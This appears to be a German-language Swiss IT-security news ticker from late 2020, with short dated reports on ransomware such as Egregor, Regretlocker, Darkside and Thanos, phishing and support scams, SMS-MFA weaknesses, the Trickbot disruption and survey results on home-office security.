Update vom 7.1.2021: Cyberkriminelle sind bereits aktiv auf der Suche nach der Schwachstelle. Wie Bleepingcomputer berichtet, suchen Unbekannte zurzeit zwar nicht direkt nach Zyxel-, aber nach SSH-Geräten. Wenn sie ein solches Gerät finden, versuchen sie mittels einer Brute-Force-Attacke Zugriff zu erhalten – dabei testen sie unter anderem auch die Zugangsdaten des "zyfwp"-Backdoor-Accounts. Andrew Morris, CEO der Cybersecurity-Firma Greynoise, vermutet, dass die Cyberkriminellen möglicherweise indirekt nach Zyxel-Geräten sucht, um unter dem Radar zu bleiben. 

30.11.2020 - 15:32 Uhr

Falscher Windows-Support: Kapo Zürich warnt vor Cyberbetrügern 

Die Kantonspolizei Zürich warnt vor Cyberkriminellen, die sich als Windows-Support ausgeben. Die Betrugsversuche beginnen damit, dass das Opfer nur noch dubiose Anmeldefenster und Warnungen sieht. "Windows wurde aufgrund verdächtiger Aktivitäten blockiert" oder "Ihr Computer wurde infiziert". Es scheine so, als ob nichts mehr funktionieren würde, schreibt die Kapo Zürich.

Die Warnungen enthalten auch eine Schweizer Telefonnummer. Die Person am anderen Ende der Leitung spreche perfektes Schweizerdeutsch und biete an, den Rechner zu deblockieren. Das koste nur 499 Franken und dafür müsse das Opfer auch lediglich eine Fernwartungssoftware auf dem PC installieren. Eine doppelte Falle.

Screenshot der gefälschten Windows-Warnung. (Source: Kantonspolizei Zürich)

Screenshot der gefälschten Windows-Warnung. (Source: Kantonspolizei Zürich)

 

Was wirklich passiert und was man tun kann

Tatsächlich ist mit dem Gerät alles in Ordnung. Statt den PC zu sperren, würden die Cyberbetrüger bloss eine Website mit den irreführenden Meldungen einblenden, wie die Kapo Zürich schreibt. Im schlimmsten Fall zahlt das Opfer also 499 Franken und macht seinen Rechner über die angebliche Fernwartungssoftware zugleich auch noch für weitere Attacken verwundbar. 

Die Betrüger greifen dabei auch auf "Typo Spoofing" zurück. Das heisst, dass sie Domains nutzen, die sehr ähnlich klingen, wie bekannte Websites - in der Hoffnung, dass sich jemand vertippt und so auf der betrügerischen Seite landet. 

Die Kapo Zürich rät, den Verlauf zu löschen und den Webbrowser zu schliessen - falls nötig auch mit dem Task-Manager. Wer schon Kontakt mit den Betrügern aufgenommen oder auch schon gezahlt hat, soll sich bei der lokalen Polizeistelle melden. 
 

23.11.2020 - 15:31 Uhr

Dreiste Diebe delegieren das Drohen an den Drucker

Eine Ransomware verfolgt nur ein Ziel: dem Opfer – in der Regel ein Unternehmen – das Leben so schwer wie möglich zu machen, damit dieses ein Lösegeld zahlt. Um dieses Ziel zu erreichen, verschlüsseln diese Schadprogramme sämtliche Dateien auf infizierten Rechnern – gewisse machen dabei auch vor virtuellen Laufwerken nicht halt. Die Nutzer sehen anschliessend nur noch einen Erpresserbrief der zum Zahlen des Lösegelds auffordert.

Aber was, wenn das nicht genügt, um eine Firma in die Knie zu zwingen? Viele Unternehmen wollen tunlichst vermeiden, dass irgendwer etwas von der Attacke mitkriegt. Denn dies könnte sich negativ auf den Aktienkurs oder den Ruf der Firma auswirken. 

Für solche Fälle hat sich die noch relativ junge Ransomware Egregor etwas Neues ausgedacht. Die Malware kann auch auf alle über das Netzwerk verbundenen Drucker zugreifen. So geschehen beim chilenischen Einzelhandelsunternehmen Cencosud, wie «Bleepingcomputer» berichtet. 

Ursprung des Druckauftrags noch unklar

Noch während die Rechner verschlüsselt wurden, spuckten plötzlich sämtliche Drucker im Unternehmen eine Lösegeldforderung aus. Es handelte sich dabei um denselben Erpresserbrief, den das Schadprogramm auch auf den infizierten Rechnern darstellte. 

Wie genau die Malware diesen Trick realisiert, ist noch nicht klar. Der Druckauftrag komme nicht vom ausführbaren Schadprogramm, schreibt Bleepingcomputer. Stattdessen sollen die Angreifer am Ende eines Angriffs ein Script dafür nutzen. Dieses Script wurde bislang jedoch noch nicht gefunden. 

Zuvor sind bereits der deutsche Spieleentwickler Crytek sowie das US-amerikanische Buchhandelsunternehmen Barnes & Noble Opfer von Egregor geworden. Ob es damals schon zu Attacken auf die Drucker gekommen ist, ist nicht bekannt. In beiden Fällen sollen aber auch Daten entwendet worden sein.

16.11.2020 - 18:16 Uhr

Cyberkriminelle phishen nach SMS-Codes mit gefälschten Swisscom-Mails

Die Kantonspolizei Zürich warnt vor Phishing-E-Mails, die angeblich von der Swisscom kommen. Die Mails versuchen den Empfängern vorzutäuschen, dass sie ihre November-Rechnung doppelt bezahlt hätten. Daher könnten sie nun eine Rückerstattung beantragen. 

Die missbräuchlich verwendeten Firmenlogos sowie die knappe Frist von 12 Stunden sollen mögliche Opfer dazu verleiten, sämtliche Sicherheitsbedenken ausser Acht zu lassen und ihre persönlichen Daten sowie Kreditkartendaten preiszugeben, wie die Kantonspolizei auf dem Portal cybercrimepolice.ch schreibt.

Ferner würden die Cyberkriminellen auch versuchen, so an die SMS-Codes zu kommen, welche die jeweiligen Finanzinstitute über eine Zwei-Faktor-Authentifizierung (2FA bzw. MFA für Multi-Faktor-Authentifizierung) verschicken. Eine Praxis, mit der die ZKB unlängst aufgehört hat, wie Sie hier nachlesen können

Die unsicherste Form der Multi-Faktor-Authentifizierung

Warum? Vermutlich weil die Authentifizierung per SMS - oder auch mTAN - zu den unsichersten Formen der MFA gehört. Das Problem ist grundlegend: eine Authentifizierung per SMS nutzt das Telefonnetz, das Public Switched Telephone Network (PSTN). Und dieses ist sehr anfällig, wie Microsofts Partner Director für Identity Security, Alex Weinert, in einem aktuellen Eintrag im Unternehmensblog erklärt. 

Eine Vielzahl verschiedener Geräte ist darauf angewiesen, Nachrichten über das PSTN zu erhalten. Darum sind diese Nachrichten in ihrem Format auch stark eingeschränkt und nicht anpassungsfähig. So können Sie etwa weder angereichert noch verlängert werden. Tatsächlich können die SMS-Codes kaum mehr als nur das Einmalpasswort senden. 

Ferner wurde das SMS auch entwickelt, ohne dabei an eine Verschlüsselung zu denken. Würde man nun eine Verschlüsselung hinzufügen, erklärt Weinert, könnten die Empfänger die Nachricht gar nicht lesen.

Der MFA-Dienst weiss gar nicht, was passiert

Die Konsequenz: Jeder, der sich Zugriff auf das Netzwerk verschaffen kann, ist in der Lage, die Nachrichten abzufangen und zu lesen. Noch einfacher ist es aber, den Kundendienst anzurufen. Denn dieser habe auch Zugang zum SMS- oder Sprachkanal. 

Aber auch, wenn die Nachrichten nicht abgefangen werden können, ist eine Authentifizierung über das PSTN nicht empfehlenswert. In gewissen Regionen liege die Zustellrate bei gerade mal 50 Prozent, heisst es in dem Blogeintrag. Und da SMS ein "Fire and Forget"-Medium sind, das heisst, sie werden verschickt und danach kommt kein Feedback mehr zurück, weiss der MFA-Dienst auch gar nicht, wenn ein Problem auftritt. 

Auf MFA zu verzichten, sei aber ganz klar nicht die Lösung, betont Microsoft. Stattdessen wird im Blogeintrag eine andere Alternative vorgeschlagen: eine Authentifizierung per App. Eine entsprechende Applikation bietet Microsoft natürlich gleich selbst an.  
 

09.11.2020 - 12:03 Uhr

Neue Ransomware schreckt auch nicht vor VMs und aktiven Prozessen zurück

In der Regel meidet eine Ransomware virtuelle Maschinen (VMs). Denn die dafür benötigten virtuellen Laufwerke werden – im Falle einer Windows Hyper-V-Umgebung – als einzelne, riesige VHD- oder VHDX-Dateien abgespeichert. 

Solche Dateien können also durchaus im Terabyte-Bereich sein. Je grösser die Datei, desto länger braucht eine Ransomware, um diese zu verschlüsseln. Dies verlangsamt die komplette Verschlüsselungsattacke auf den Rechner, wodurch diese ineffizienter wird.  

Das alles stört das Verschlüsselungsprogramm Regretlocker jedoch nicht. Die Ransomware kommt auf den ersten Blick eher unscheinbar daher, wie "Bleeping Computer" berichtet. Der Erpresserbrief ist nicht besonders ausgefallen und auch die Kommunikation mit den Opfern setzt nicht auf eine Tor-Zahlungsseite, sondern auf hundskommune E-Mails. 

Dafür verfügt die Malware aber über einige sehr fortgeschrittene Funktionen: So kann sie etwa virtuelle Laufwerke mounten. Dies ermöglicht es dem Schadprogramm, die darin enthaltenen Dateien einzeln zu verschlüsseln – was viel schneller geht, als wenn die Ransomware die Datei als ganzes verschlüsseln müsste. Regretlocker sucht sogar spezifisch nach virtuellen Laufwerken. 

Regretlocker nutzt APIs für gleich zwei fiese Features

Das Schadprogramm nutzt dafür die Windows-Virtual-Storage-Schnittstellen Openvirtualdisk, Attachvirtualdisk und Getvirtualdiskphysicalpath. Die verschlüsselten Dateien erhalten die Endung ".mouse".

Das Mounten virtueller Laufwerke ist aber nicht der einzige Trick, den Regretlocker drauf hat. Die Ransomware verwendet auch die Windows-Restart-Manager-API. So kann sie auch laufende Prozesse unterbrechen, um die dazugehörigen Dateien zu verschlüsseln. 

Dabei achtet das Schadprogramm jedoch darauf, keine Prozesse zu beenden, deren Namen 'vnc', 'ssh', 'mstsc', 'System', oder 'svchost.exe' enthalten. Vermutlich soll dies einen kritischen Systemfehler oder die eigene Terminierung verhindern. 

Gemäss "Bleeping Computer" ist Regretlocker noch nicht sehr aktiv. Aufgrund der fortgeschrittenen Funktionen müsse man diese neue Ransomware-Familie dennoch auf dem Schirm behalten. 
 

02.11.2020 - 15:30 Uhr

G Data warnt vor existenzbedrohenden IT-Zombies

"Hexen und Zombies sind zu Halloween allgegenwärtig, aber nach dem Fest wieder verschwunden. In vielen Unternehmen sind Untote das ganze Jahr über aktiv", sagt Tim Berghoff, Security Evangelist beim deutschen Cybersecurity-Anbieter G Data.

Gemeint sind Windows-XP-Systeme. Diese seien wie Zombies nur schwer tot zu kriegen, teilt das Unternehmen mit. Zwar liege der Anteil von XP-Systemen nur bei etwa 0,8 Prozent. Aber in einem Millionengeschäft wie dem Computermarkt ist ein knappes Prozent dennoch eine hohe Zahl, wenn man sie in verwundbaren Firmen zählt.

Insbesondere in der Fertigung laufen viele Steuercomputer nur auf XP-Rechnern oder anderen veralteten Betriebssystemen. Systeme, bei denen der Herstellersupport schon seit Jahren abgelaufen ist und – etwa im Fall von XP – von denen der Quellcode teilweise geleakt wurde.

Ein weiteres Problem seien veraltete Server: G Data zitiert in der Mitteilung eine Studie, gemäss der 58 Prozent aller Windows-Serer veraltet sind und nicht mehr mit den nötigen Updates versorgt werden. Wenn zusätzlich noch eine Abwärtskompatibilität gewährleistet werden muss, kann dies zu einer „fatalen Kaskade von Sicherheitslücken“ führen, wie G Data schreibt.

Neuanschaffung oder Separierung

"Das ist unverantwortlich, denn es gefährdet die Sicherheit und damit auch den wirtschaftlichen Erfolg der Firmen", sagt Berghoff. Hier bestehe ein dringender Handlungsbedarf, sonst würden hohe Image- und wirtschaftliche Verluste drohen, wenn bekannt wird, dass der Angriff über veraltete Betriebssysteme lief.

Die beste Option ist eine Neuanschaffung modernerer Geräte. So ein Update auf neue Systeme ist gerade bei den Steuercomputern aber oftmals nicht möglich – oder mit einem unrealistischen Aufwand verbunden.

Für solche Fälle gibt es eine andere Option: eine konsequente Separierung des Netzwerks. Die betroffenen Systeme sollten in einem eigenen Netzwerk und sofern möglich ohne Internetverbindung untergebracht werden. Ein hartes Regelwerk für die Nutzung hilft zusätzlich, die IT des gesamten Unternehmens zu sichern.
 

26.10.2020 - 18:01 Uhr

Kriminelle Samariter spenden einen Teil ihrer Ransomware-Einnahmen

Klingt ominös, hat aber ein Herz für Kinder: die Ransomware Darkside. Die Drahtzieher hinter dem Schadprogramm spenden nämlich einen Teil ihrer Einnahmen für wohltätige Zwecke. 

So konnten die Cyberkriminellen etwa zwei Spenden für je 10'000 US-Dollar in Bitcoin belegen. Diese gingen an die Organisationen Children International und The Water Project. Dies teilten die Kriminellen in einer Pressemitteilung auf ihrer Website mit. Auf derselben Website, auf der sie auch gestohlene Daten veröffentlichen, wenn ein Opfer das Lösegeld nicht zahlen will. 

Nach eigenen Angaben greifen die Darkside-Drahtzieher nur grosse und profitable Unternehmen an. Nachdem ihre Ransomware die Unternehmensdaten verschlüsselt hat, verlangen sie ein Lösegeld von 200'000 bis 2'000'000 US-Dollar, wie "Bleepingcomputer" berichtet.

Es sei "nur fair", dass ein Teil dieses Geldes an Wohltätigkeitsorganisationen gespendet werde. "Ganz egal, wie bösartig unsere Arbeit Ihrer Meinung nach ist, wir freuen uns darüber, dass wir Menschen helfen konnten", schreiben die Erpresser. 

Die Organisation Children International sagte gegenüber Bleepingcomputer, dass sie den Fall untersuchen. Sollten Spenden mit einem Hack in Verbindung gebracht werden, würde die Organisation die Gelder nicht behalten. 

Die kriminellen Samariter lassen sich davon anscheinend nicht beeindrucken. Sie wollen weiterhin für gute Zwecke spenden – aber künftig wohl anonym. 

20.10.2020 - 12:30 Uhr

Neue Mobile-Malware für Android taucht im Sekundentakt auf

Alle 8 Sekunden veröffentlichen Cyberkriminelle eine schädliche App für Android-Geräte. Pro Tag ergibt dies durchschnittlich über 11'000 neu infizierte Apps, wie G Data mitteilt. Insgesamt zählte der deutsche IT-Sicherheitsanbieter im ersten Halbjahr 2020 mehr als 2 Millionen schädliche Android-Apps. Im Vergleich zum ersten Halbjahr 2019 sei dies ein Anstieg von 10 Prozent. 

Ein bekanntes Problem in diesem Zusammenhang sind gemäss Mitteilung vermeintliche Smartphone-Schnäppchen. Denn immer wieder würden Smartphones in den Handel gelangen, auf denen bereits schädliche Apps vorinstalliert oder das Betriebssystem manipuliert wurde. 

In der Regel bietet der offizielle Google Play Store einen gewissen Schutz vor solchen Apps. Dies versuchen Cyberkriminelle vermehrt mit Droppern zu umgehen. Der Clou: Die Installationsdatei, die im Play Store erhältlich ist, ist eigentlich harmlos. In einem zweiten Schritt werden die bösartigen Funktionalitäten jedoch in einem Update nachgeladen.

Erster DDoS-Angrif per Mobile-Botnet

Vor diesem Problem warnt auch Marktbegleiter Eset in einer Mitteilung. Der slowakische Cybersecurity-Anbieter deckte in diesem Jahr erstmals einen DDoS-Angriff per Mobile-Botnet auf. Das Opfer? Eset selbst. Die Täter attackierten mit gekaperten Smartphones die Website des Unternehmens. Die Malware gelangte dabei ebenfalls per Dropper aufs Handy. 

Die App mit dem Namen "Updates for Android" wurde bis Januar 2020 über 50'000 Mal heruntergeladen – der schädliche Nachzügler wurde erst zwei Wochen vor dem Angriff nachgeladen. Etwa 10 Prozent der infizierten Geräte wurden später aktiviert. Während 7 Stunden bombardierten sie die Website mit Aufrufen im Sekundentakt. 

Die Auswirkungen halten sich in Grenzen. "Unter dem Strich war der einzige Effekt des Angriffs, dass die Angreifer ihr Botnetz offengelegt haben", sagt Lukas Stefanko, Android Malware Researcher bei Eset. "Praktisch existiert dieses DDoS-Tool nicht mehr." Die App wurde an Google gemeldet und umgehend aus dem Play Store entfernt.

12.10.2020 - 12:10 Uhr

US-Militär legt Trickbot lahm – zumindest für einen Moment

Eines der grössten Botnetze im Cyberraum, Trickbot, wird seit Ende September immer wieder von Ausfällen geplagt. Das kriminelle Netzwerk besteht aus über einer Million gehackter Rechner und verbreitet diverse Schadprogramme, darunter etwa die vielfältige Malware Trickbot oder auch die Ransomware Ryuk. 

Wie Krebsonsecurity zuvor berichtete, wurden die "Command and Control"-Server des Netzwerks am 22. September und am 1. Oktober gestört. Wer dahinter steckte, war damals noch nicht bekannt. Die Kommunikation zwischen den infizierten Rechnern und den Servern wurde dadurch effektiv unterbrochen. 

Teil einer grösseren Strategie

Wie die Washington Post nun berichtet, handelte es sich dabei um eine grössere Operation des United States Cyber Command, einer Behörde des US-amerikanischen Militärs. Das US-Militär rechne nicht damit, das Trickbot-Botnetz auf diese Weise permanent zu zerschlagen. 

Die Operation sei aber Teil einer längeren Strategie. Oberbefehlshaber General Paul Nakasone beschreibt diese als "persistent engagement". Das Ziel sei es, den Gegner ständig zu beschäftigen und so für die Gegenseite kumulative Kosten zu generieren. Kurzfristig will Cyber Command so die bevorstehende Präsidentschaftswahl in den USA vor ausländischen Bedrohungen schützen, wie es in dem Bericht heisst.

"Das war ein Schlag in die Magengrube für die Bösen, aber kein Knockout", bringt Alex Holden, CISO beim US-amerikanischen Dienstleister Hold Security, es im Beitrag der Post auf den Punkt. "Die Störungen wurden zwar als unangenehm empfunden, aber die meisten Aktivitäten wurden innerhalb von zwei bis drei Tagen wieder aufgenommen."

Update vom 16.10.2020: Auch der Privatsektor hat diese Woche Trickbot einen Schlag versetzt. Wie Eset mitteilt, beteiligte sich der slowakische Cybersecurity-Anbieter zusammen mit Microsoft, Black Lotus Labs Threat Research von Lumen, NTT und weiteren Unternehmen an einer globalen Offensive gegen die Betreiber des Botnets. Dem Konsortium gelang es laut Mitteilung, die Command-and-Control-Server lahmzulegen und so die Machenschaften der Cyberkriminellen zu stören. 

05.10.2020 - 17:24 Uhr

Hacker zwacken Löhne von Mitarbeitenden an Schweizer Hochschulen ab

Cyberkriminelle sind in die Netzwerke mehrerer Schweizer Hochschulen eingedrungen. Einmal drin, manipulierten sie Lohnüberweisungen. Statt auf die Konten der Mitarbeitenden ging das Geld auf die Konten der Hacker und von dort aus teilweise weiter ins Ausland, wie die Sonntagszeitung berichtet.

In das Netzwerk kamen die Hacker mittels Phishing. Das heisst, sie nutzten gestohlene Zugangsdaten von Mitarbeitenden, welche sie mit betrügerischen E-Mails erbeuteten. Zudem hätten die Cyberkriminellen auch mit gefälschten E-Mails von gehackten E-Mail-Accounts von Mitarbeitenden operiert, zitiert der Bericht ein Rundmail der Dachorganisation Swissuniversities. Demnach seien den Hackern mindestens drei Hochschulen in der Schweiz zum Opfer gefallen.

Ein sechsstelliger Betrag

Zu den betroffenen Hochschulen gehört auch die Universität Basel. Die Uni "passte die internen IT-Abläufe so an, dass der erfolgte Hacker-Zugriff in dieser Form nicht mehr möglich sein wird", zitiert der Bericht den Sprecher der Universität Basel.

Auch die Universität Zürich wurde laut dem Bericht angegriffen. Dort seien die Phishing-Attacken jedoch nicht erfolgreich gewesen, da die Mitarbeitenden diese als Betrugsversuche erkannten. 

An der Uni Basel sei ein finanzieller Schaden von 15'000 Franken entstanden. Die Staatsanwaltschaft des Kantons Basel-Stadt sagt gegenüber der Sonntagszeitung, dass insgesamt "mehrere Hochschulen" um "einen sechsstelligen Betrag" erleichtert wurden.

29.09.2020 - 15:37 Uhr

Gamer in Gefahr - Videospielsektor besonders gebeutelt durch Cyberattacken

Weltweit gibt es rund 2,7 Milliarden Gamer. Bis Ende Jahr sollen sie fast 160 Milliarden US-Dollar für und in Videospielen aller Art ausgeben. Bis 2023 soll der Umsatz auf mehr als 200 Milliarden Dollar ansteigen – die Ausgaben für Hardware nicht mitgerechnet.

Die Zahlen des Marktforschers Newzoo zeigen: Der Gaming-Markt ist ein äusserst lukratives Geschäft. Virtuelle Gegenstände etwa, welche nur in einem Spiel genutzt werden können, erzielen auf Ebay und Co. zum Teil Rekordpreise.

Das ist jedoch nicht nur den Händlern und Entwicklern aufgefallen. Die Gaming-Branche gehört zu den am meisten von Cyberangriffen betroffenen Sektoren, wie der Sicherheitsbericht "State of the Internet / Gaming: You Can’t Solo Security" (Download als PDF) von Akamai zeigt.

"Es ist nur noch ein schmaler Grat zwischen virtuellen Kämpfen und Attacken in der realen Welt", sagt Steve Ragan, Akamai Security Researcher und Autor des Sicherheitsberichts. "Kriminelle starten unerbittliche Angriffswellen gegen Spiele und Spieler, um Accounts zu kompromittieren, persönliche Informationen sowie In-Game-Assets zu stehlen und sich an ihnen zu bereichern oder um Wettbewerbsvorteile zu erzielen."

DDoS, Phishing und Credential Stuffing

Die grössten Bedrohungen für Gamer und die Gaming-Industrie seien Credential-Stuffing- und Phishing-Attacken. Zwischen Juli 2018 und Juni 2020 beobachtete Akamai fast 10 Milliarden Credential-Stuffing-Angriffe, die auf den Gaming-Sektor abzielten. Dies sind laut dem Bericht knapp 10 Prozent aller Attacken dieser Art.

Was DDoS-Attacken betrifft, ist der Gaming-Sektor ganz klar der am meisten betroffene. Von den 5600 Angriffen dieser Art, welche Akamai zwischen Juli 2019 und Juni registrierte, hatten es 3000 auf die Gaming-Industrie abgesehen.

Credential Stuffing? Phishing? DDoS? Was ist das alles schon wieder? Die Antworten lesen Sie im IT-Security Glossar. Dieses verschafft einen schnellen Überblick über die wichtigsten Begriffe im Bereich Cybersecurity.

Spielbezogene DDoS-Angriffe nehmen laut der Studie stark zu während Schulferien und Feiertagen. Für Akamai ist dies ein Hinweis darauf, dass diese Attacken wohl oft von Schülern ausgehen. 

Trotzdem seien Gamer nicht genügend für die Gefahren von Cyberattacken sensibilisiert – obwohl mehr als jeder zweite intensive Gamer schon einmal selbst gehackt wurde (55 Prozent). Darüber besorgt waren jedoch nur 20 Prozent. Dies zeige, dass Gamer den Wert der mit ihren Konten verbundenen Daten nicht erkennen.

21.09.2020 - 14:01 Uhr

So schützen Schweizer Firmen ihre Daten im Homeoffice – oder eben nicht

Mit dem Coronavirus ist auch das Homeoffice gekommen. Aufgrund des Lockdowns schickten viele Unternehmen ihre Mitarbeitenden nach Hause, um von dort aus zu arbeiten. Auch Firmen, die sonst ihre Teams lieber bei sich im Büro halten. Nun ist der Lockdown aber wieder vorbei und zurück bleibt noch die Frage, wie nachhaltig dieser plötzliche und unausweichliche Trend zum Homeoffice sein wird. 

Gemäss einer Umfrage des slowakischen IT-Security-Anbieters Eset hoffen 68 Prozent der befragten Mitarbeitenden auf mehr Flexibilität von ihrem Arbeitgeber im Umgang mit Homeoffice. 

 

 

 

Die befragten Unternehmen sehen dies jedoch nicht unbedingt gleich. Laut Eset ist etwa bei einem Viertel der Firmen noch immer kein Homeoffice möglich. Dafür gaben 30 Prozent der Befragten an, dass über die Hälfte ihrer Mitarbeiter von zuhause aus arbeiten können. Ein Weiteres knappes Drittel hat bis zu 30 Prozent der Mitarbeitenden im Homeoffice. 

Auf die Frage "Werden Sie auch nach der Coronakrise Ihren Mitarbeitern das Arbeiten im Homeoffice ermöglichen?“ antworteten 51 Prozent der befragten Schweizer Unternehmen mit "Ja, jederzeit“. Weitere 39 Prozent wollen dies teilweise ermöglichen. 5 Prozent verneinten. 

Jedes zehnte Unternehmen weiss nicht, wie die Daten geschützt werden

Und wie schützen die Firmen ihre zerstreuten Teams? 68 Prozent setzen gemäss der Umfrage auf eine zentral verwaltete IT-Sicherheitslösung – wie etwa ein Virenschutz oder eine Firewall. Eine Verschlüsselung kommt bei 40 Prozent der Befragten zum Einsatz. Jedes vierte Unternehmen benutzt zudem einen Datenschredder. 

Eher ernüchternd ist jedoch, dass jedes zehnte Unternehmen in der Schweiz nicht genau weiss, wie die Daten auf den Rechnern im Homeoffice geschützt werden. Die Prozentzahlen liegen übrigens in der Schweiz durchs Band jeweils leicht höher als in Deutschland. 

Die Hälfte der teilnehmenden Unternehmen schützt dabei den Zugang zum Firmennetzwerk mit einer VPN-Verbindung. 37 Prozent gaben an, dass der Zugang nur mit Passwort möglich ist. Eine Zwei-Faktor-Authentifizierung setzen 35 Prozent der befragten Firmen ein. 

 

 

 

"Für Cyberkriminelle ist es ein Leichtes, Passwörter zu knacken“, sagt Rainer Schwegler, Country Leader Schweiz bei Eset dazu. "Deshalb ist eine umfassend geschützte IT-Infrastruktur umso wichtiger. Multi-Faktor-Zugänge sind einfach einzurichten und bieten massgeblich mehr Schutz."

Zuhause angesteckt, im Büro eingesteckt

Auch der japanische Mitbewerber Trend Micro befasste sich in einer Studie mit dem Thema Homeoffice. Demnach nutzen 29 Prozent der Befragten in der Schweiz private Geräte, um auf Unternehmensdaten zuzugreifen – global sind es 39 Prozent. Dies sei problematisch, da persönliche Smartphones, Tablets und Laptops oftmals weniger sicher seien als Firmengeräte. Ein Drittel der Befragten (CH: 33 Prozent, global 36 Prozent) hätten etwa nicht einmal einen grundlegenden Passwortschutz auf allen persönlichen Geräten. 

Die Studie von Trend Micro zeigt auch, dass Schweizer und Schweizerinnen viel vernetzter leben. 80 Prozent der Remote-Arbeitenden haben IoT-Geräte in ihrem Heimnetzwerk – global sind es lediglich 52 Prozent. Teilweise auch von weniger bekannten Marken. Derartige Geräte haben jedoch oftmals Sicherheitslücken, wie nicht gepatchte Firmware-Schwachstellen und unsichere Logins.

Dies könnte auch bei der Rückkehr ins Büro zu Problemen führen – etwa wenn das Unternehmen einen "Bring Your Own Device“-Ansatz verfolgt. So dringen Malware-Infektionen, welche man sich zuhause eingefangen hat, auch ins Büronetzwerk ein und bedrohen Unternehmensdaten und –systeme.

Nach der Krise: sparen oder investieren?

So manches Unternehmen muss wegen Corona nun den Gürtel enger schnallen, wie Eset schreibt. In der Schweiz jedoch mehr als in Deutschland. Über die Hälfte der Befragten im Nachbarland gab an, dass derzeit keine Investitionen zurückgestellt werden. In der Schweiz konnten das nur 42 Prozent der Firmen sagen. Auch auf die einzelnen Kategorien heruntergebrochen lag der Anteil Firmen, die derzeit sparen, in der Schweiz jeweils klar höher als in Deutschland. 

 

 

 

Wenn aber mehr Geld ausgegeben wird, dann für die Sicherheit, wie es in der Studie heisst. Und zwar zu gleichen Teilen für Verschlüsselungslösungen auf Notebooks, Virenschutz und Zwei-Faktor-Authentifizierung mit je 25 Prozent. Darauf folgen VPN-Lösungen mit 21 Prozent und Managed Services mit 17 Prozent. 

In Deutschland erzielte der Virenschutz mit 14 Prozent der Befragten die meisten Nennungen. Darauf folgen VPN- und Verschlüsselungslösungen mit 13 beziehungsweise 12 Prozent. Was auffällt: In Deutschland planen deutlich mehr Unternehmen, keine Budgetveränderungen vorzunehmen.

 

 

 

MSPs könnten entlasten

"Zunächst weiten Unternehmen ihre altbewährten Lösungen wie Verschlüsselung oder Virenschutz auf die mobilen Geräte aus“ kommentiert Schwegler die Zahlen. "Doch zunehmend erkennen sie auch, dass ihr Know-how in Sachen Sicherheit an Grenzen stösst.“

Rainer Schwegler, Country Leader Schweiz bei Eset. (Source: Netzmedien)

Rainer Schwegler, Country Leader Schweiz bei Eset. (Source: Netzmedien)

Hier könnten MSPs entlasten. "Und zwar nicht nur in Bezug auf die Professionalität der Security-Dienste, sondern auch auf deren sofortige Verfügbarkeit und Kosteneffizienz", sagt Schwegler. Hersteller, Fachhandel und Systemhäuser könnten daher in diesen Bereichen bis Ende 2020 mit höheren Wachstumsraten rechnen.

Zu den Themen, welche die Befragten in der Schweiz und in Deutschland als zu komplex betrachten, um sie intern zu betreuen, gehören etwa Firewalls, Penetration Tests und Threat Management and Defense. Allerdings sagte eine deutliche Mehrheit, nämlich 39 Prozent, ganz klar, dass sie keinen Bereich als zu komplex für die interne Betreuung erachten. 

 

 

 

Zur Methodik: Für die Studie befragte Eset über einen Drittanbieter 520 deutsche und 106 Schweizer Unternehmen, Behörden und Non-Profit-Organisationen. Die Ergebnisse wurden gemäss Eset entsprechend gewichtet und in der Studie "Quo Vadis, Unternehmen?" zusammengetragen. Trend Micro befragte über 13'000 Remote-Mitarbeitende in 27 Ländern weltweit – davon 537 in der Schweiz. Die Ergebnisse veröffentlichte das Unternehmen in der Studie “Head in the Clouds”.
 

14.09.2020 - 10:47 Uhr

Bund warnt vor Wolf im Steuerverwaltungs-Pelz

Das Nationale Zentrum für Cybersicherheit (NCSC) mahnt zur Vorsicht. Gemäss dem Security-Kompetenzzentrum des Bundes kursieren derzeit betrügerische SMS. Diese geben vor, von der Eidgenössischen Steuerverwaltung (ESTV) zu kommen – dem ist aber nicht so.

Die SMS behaupte, der Empfänger habe eine Rechnung doppelt bezahlt und erhalte nun Geld zurück. Das NCSC warnt nachdrücklich davor, auf den in der SMS enthaltenen Link zu klicken. Die ESTV rät in ihrer Warnung zudem dazu, die SMS umgehend zu löschen.

Was genau passiert, wenn man doch auf den Link klickt, verrät die Warnung nicht. Derartige Phishing-Attacken zielen jedoch in der Regel darauf ab, an vertrauliche Daten wie etwa Zahlungsinformationen zu kommen, oder das Opfer dazu zu bewegen, ein Schadprogramm herunterzuladen.

14.09.2020 - 10:34 Uhr

Trickbot und Co. machen Jagd auf Tuxli

Der Windows-Schädling Trickbot hat neuerdings auch Linux-Systeme im Visier. Trickbot ist eine äusserst vielseitige Malware-Plattform, die sich für verschiedene finstere Zwecke eignet – darunter auch das Stehlen von Informationen und Zugangsdaten.

Das Schadprogramm zeichnet sich vor allem dadurch aus, dass es sich konstant und im hohen Tempo weiterentwickelt und neue Tricks lernt. Der jüngste Trick: Die Windows-Malware kann sich nun auf Linux-Systemen einnisten. Dies ermöglicht es den Angreifern, verdeckt auf Windows-Geräte im selben Netzwerk zuzugreifen. 

Für Hacker eröffnet das einen neuen Angriffsvektor: Sie können Server in einer Unix-Umgebung attackieren und anschliessend von dort aus das gesamte Firmennetzwerk übernehmen. Was es den Hackern noch einfacher macht: Auch viele IoT-Geräte wie etwa Router oder NAS nutzen Linux und sind somit ein potenzielles Einfallstor für Trickbot. 

Die Malware Trickbot ist nicht das einzige Cyberrisiko, das Linux-Nutzer im Auge behalten sollten. Trend Micro warnt derzeit vor einer neuen Malware namens Ensiko. Diese könne Dateien auf jedem System infizieren, auf dem PHP läuft. Folglich könne Ensiko für Ransomware-Attacken auf Windows- und MacOS-Geräten sowie auf Linux-Web-Server genutzt werden. Der Schädling verschlüsselt die Dateien in einer Web-Shell-Directory und hängt die Erweiterung .bak an die verarbeiteten Dateien.

07.09.2020 - 14:31 Uhr

Doch nicht unvermeidbar – Ransomware Thanos greift Boot Sector an und scheitert

Die Ransomware Thanos hat einen neuen Trick gelernt – oder eben auch nicht. Ein neuer Stamm der Malware, der im Nahen Osten und Nordafrika entdeckt wurde, hat es auf den Master Boot Record (MBR) abgesehen. Entdeckt wurde die neue Variante von Unit 42, der Cybersecurity-Sparte von Palo Alto Networks. 

Der MBR wird zum Booten eines Rechners verwendet. Er enthält eine Partitionstabelle sowie ein Startprogramm für BIOS-basierte Computer. "Das Überschreiben des MBR ist eine destruktivere Herangehensweise für Ransomware als üblich", schreibt Unit 42. "Die Opfer müssten mehr Mühe aufwenden, um ihre Dateien wiederzuerlangen - selbst wenn sie das Lösegeld zahlen würden."

